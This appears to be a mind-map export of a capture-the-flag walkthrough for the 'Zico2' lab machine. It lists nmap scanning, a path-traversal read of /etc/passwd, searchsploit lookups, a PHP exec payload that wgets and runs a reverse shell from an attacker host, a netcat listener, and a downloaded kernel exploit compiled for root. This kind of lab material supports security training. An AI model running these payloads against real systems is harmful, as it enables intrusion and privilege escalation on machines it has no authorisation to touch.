Please enable JavaScript.
Coggle requires JavaScript to display documents.
Zico2 (Enumeration (6: 80/http (7: website inspection (8: LFI…
Zico2
Enumeration
6: 80/http
7: website inspection
8: LFI vulnerability
9: 10.0.2.9/view.php?page=/../../etc/passwd
Found User(zico)
10: dirb
http://10.0.2.9/
11: dbadmin directory
12: Login page
13: randomly guess password
successfully logged in
14: searchsploit phpLiteAdmin
1 more item...
5: 111/rpcbind
searchsploit rpcbind
No exploit found
3: 22/ssh
check ssh version
4: searchsploit OpenSSH_8.0p1
No exploit found
Scanning
1: Nmap -sn 10.0.2.1/24
2: Nmap 10.0.2.9
Exploit & Privilege Escalation
15: create new table
execute python script
16: <?php exec("wget 10.0.2.10/shell.txt -O /tmp/reverse.php; php /tmp/reverse.php"); ?>
17: nc -lvp 1234
found kernal version
18: linux zico 3.2.0-23 gereric
19: searchsploit 3.2.0
20: wget
http://10.0.2.10/33589.c
-O /tmp/exploit.c
21: gcc exploit.c -O2 -o exploit
22: python -c "import pty; pty.spawn('/bin/bash')"
23:
root@zico
:/cd /root
2 more items...